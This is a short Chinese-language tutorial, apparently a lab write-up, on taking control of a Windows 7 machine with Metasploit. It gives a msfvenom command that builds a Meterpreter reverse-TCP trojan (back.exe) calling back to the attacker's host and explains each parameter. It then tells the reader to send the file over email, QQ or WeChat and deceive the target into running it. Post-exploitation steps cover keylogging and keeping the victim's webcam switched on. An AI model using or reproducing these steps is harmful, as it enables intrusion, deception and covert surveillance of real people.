利用msf生成木马控制win7
第一步:扫描win系统有哪些开放端口
发现目标主机 192.168.10.130 上的三个TCP端口处于开放状态:
- 135/tcp:运行 Microsoft RPC 服务
- 139/tcp:运行 NetBIOS-SSN 服务
- 445/tcp:运行 Microsoft-DS (Directory Services) 服务
第二步:生成木马
在Kali Linux中使用Metasploit的msfvenom工具生成一个Windows平台的Meterpreter反向TCP shell载荷
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击机IP lport=自己设定不被占用端口号 -f 生成文件类型 -o 输出保存位置
表实验后续 参数解释
参数 | 含义 |
-p windows/meterpreter/reverse_tcp | 指定要生成的Payload类型为Windows平台的Meterpreter反向TCP shell。以便与Kali Linux上的攻击者建立反向TCP连接 |
lhost=192.168.0.103 | 设置要连接回的IP地址,即指定Meterpreter shell将连接的IP地址 |
lport=4444 | 设置连接的端口号,即指定Meterpreter shell将使用的本地端口 |
-f exe | 指定生成的文件格式为可执行文件(exe) |
-o back.exe | 指定输出文件的名称为back.exe |
第三步:传播木马
通过邮件、QQ、微信发送给对方,诱听对方运行木马。
在把back.exe拖拽到受害者的主机上(win7如果不能粘贴外来文件,就把虚拟机中的VMware Tools打开安装就行)
就可以实现外来文件的粘贴复制了
第四步:接下来我们打开监听功能
第五步:使用meterpreter继续后渗透
Ps进程获取
1)对键盘输入(记事本)进行监控
2)控制对方摄像头
实施监控,一直打开摄像头